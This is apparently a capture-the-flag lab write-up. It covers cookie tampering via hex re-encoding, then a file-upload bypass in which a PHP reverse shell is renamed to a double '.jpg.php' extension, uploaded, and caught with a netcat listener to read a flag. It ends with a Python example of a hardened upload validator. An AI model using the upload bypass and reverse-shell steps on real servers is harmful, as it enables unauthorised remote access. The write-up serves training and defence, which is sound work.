[Day 1] Web Exploitation: A Christmas Crisis [encoding]
- Register and log in
- Check cookies
- Decode using Cyberchef
- Only digits and letters a-f → hex encoding
- Recognise format
- Adjust username and re-encode using Cyberchef
- Replace cookie value and refresh page
- Turn everything on → success!
[Day 2] Web Exploitation: The Elf Strikes Back! [file upload]
- Create exploit script as described
- Go to the URL, passing the id token as a GET parameter:
http://<url>/?id=<id-token>
- Check source code for upload types
- Rename script to bypass filter
$ mv php-reverse-shell.php php-reverse-shell.jpg.php
- Upload the file. The only response is the simple message "File received successfully!"
- Check Burp Suite history - the POST went to /upload, so perhaps the files are served from /uploads/? Test: http://10.10.35.237/uploads/ → success!
- Also checked the page source, found http://10.10.35.237/assets/js/upload.js. It's obfuscated, so used https://beautifier.io/ and http://jsnice.org/ to make sense of it. However, it doesn't seem to give much.
- Hints suggest using a directory brute-forcer
- Set up netcat listener:
$ sudo nc -lvnp 443
- Click the file from http://10.10.35.237/uploads/, or visit the full URL http://10.10.35.237/uploads/php-reverse-shell.jpg.php
- Check netcat: the reverse shell has connected back
sh-4.4$ cat /var/www/flag.txt
→ success!
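Added example (not the challenge's own code) showing the kind of first-dot extension check that a `.jpg.php` rename slips past, next to a hardened validator that takes the final extension only, rejects extra dots, checks magic bytes, and stores the file under a server-chosen name so nothing is reachable at a predictable /uploads/<original-name> path. The allowlist, magic-byte table and sample file bytes are assumptions constructed for the example, not taken from the challenge.

```python
import os
import re
import secrets

# Constructed allowlist and magic-byte table (assumptions for this example).
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}
MAGIC = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}


def naive_is_allowed(filename: str) -> bool:
    """Weak check (constructed illustration): trusts the text after the
    FIRST dot, so 'shell.jpg.php' is classified as a 'jpg' upload."""
    parts = filename.lower().split(".")
    return len(parts) > 1 and "." + parts[1] in ALLOWED_EXTENSIONS


def hardened_is_allowed(filename: str, data: bytes) -> bool:
    """Validate on the FINAL extension, refuse any second dot or path
    component, and require the content to start with the expected magic."""
    base = os.path.basename(filename)
    if not base or base != filename:          # '../x.jpg' or 'dir/x.jpg'
        return False
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_EXTENSIONS:         # '.php', '.phtml', '' ...
        return False
    if "." in stem:                           # double extension 'x.jpg.php'
        return False
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem):
        return False
    return data.startswith(MAGIC[ext])        # bytes must look like the image


def storage_name(ext: str) -> str:
    """Server-chosen random name: the client's filename never reaches disk,
    so an attacker cannot guess the stored path from what they uploaded."""
    return secrets.token_hex(16) + ext.lower()
```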
[Day 3] Web Exploitation: Christmas Chaos [brute force]